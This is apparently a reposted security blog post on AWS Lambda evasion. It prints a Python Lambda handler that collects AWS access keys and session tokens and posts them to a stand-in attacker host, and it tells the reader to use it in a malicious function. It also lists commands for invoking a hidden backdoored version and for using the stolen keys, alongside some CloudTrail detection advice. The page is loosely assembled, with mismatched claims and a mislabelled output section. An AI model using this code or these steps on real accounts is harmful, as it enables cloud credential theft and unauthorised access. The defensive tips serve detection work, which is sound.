AWS Evasion Techniques: Lambda Persistence and Versioning Exploits

By /

Listen to this Post

Featured Image
Datadog AWS Evasion Techniques

Attackers are increasingly leveraging AWS Lambda functions and API Gateways for stealthy persistence. Instead of creating new IAM users (a heavily monitored action), advanced adversaries now extract credentials from `/proc/self/environ` within Lambda functions. This allows them to:
– Exfiltrate temporary AWS credentials.
– Operate stealthily under Lambda’s identity.
– Avoid detection by avoiding IAM user creation logs.

You Should Know:

1. Extracting Lambda Credentials

Lambda stores temporary credentials in environment variables. Use the following Python code in a malicious Lambda to exfiltrate them: 

import os
import requests

def lambda_handler(event, context):
creds = {
"AWS_ACCESS_KEY_ID": os.getenv("AWS_ACCESS_KEY_ID"),
"AWS_SECRET_ACCESS_KEY": os.getenv("AWS_SECRET_ACCESS_KEY"),
"AWS_SESSION_TOKEN": os.getenv("AWS_SESSION_TOKEN")
}
requests.post("https://attacker-server.com/exfil", json=creds)
return {"status": "200"}

2. Hiding Malicious Lambda Versions

Attackers deploy a benign `$LATEST` version while invoking an older, backdoored version: 

aws lambda invoke --function-name MyFunction:1 --payload '{}' output.txt

Detection Tip: Monitor all Lambda version invocations, not just $LATEST.

3. Blue Team Countermeasures

  • Enable AWS CloudTrail for all regions.
  • Detect unusual Lambda invocations: 
    fields @timestamp, eventSource, eventName, userIdentity.arn 
| filter eventSource = "lambda.amazonaws.com" 
| filter eventName = "Invoke" 
| stats count() by userIdentity.arn
  • Restrict Lambda IAM Roles with least privilege.

4. Post-Exploitation with Exfiltrated Keys

Use stolen credentials in another environment:

export AWS_ACCESS_KEY_ID="AKIA..." 
export AWS_SECRET_ACCESS_KEY="..." 
export AWS_SESSION_TOKEN="..." 
aws sts get-caller-identity  Verify access 
aws s3 ls  Check for data exfiltration

What Undercode Say:

Attackers will continue evolving AWS evasion tactics. Expect:

  • More abuse of serverless services (Step Functions, EventBridge).
  • Increased use of Lambda layers for hiding malware.
  • DNS tunneling via Lambda for data exfiltration.

Defenders must:

  • Monitor Lambda versioning.
  • Restrict outbound Lambda traffic.
  • Audit IAM roles assigned to Lambda.

Expected Output:

$ aws lambda list-versions-by-function --function-name MyFunction 
$ aws cloudtrail lookup-events --lookup-attributes AttributeKey=EventName,AttributeValue=Invoke

Prediction:

Cloud threat actors will increasingly weaponize serverless functions, making runtime security and granular IAM controls critical in 2025.

IT/Security Reporter URL:

Reported By: Activity 7338467544116121600 – Hackers Feeds
Extra Hub: Undercode MoN
Basic Verification: Pass ✅

Join Our Cyber World:

💬 Whatsapp | 💬 Telegram

Related Posts: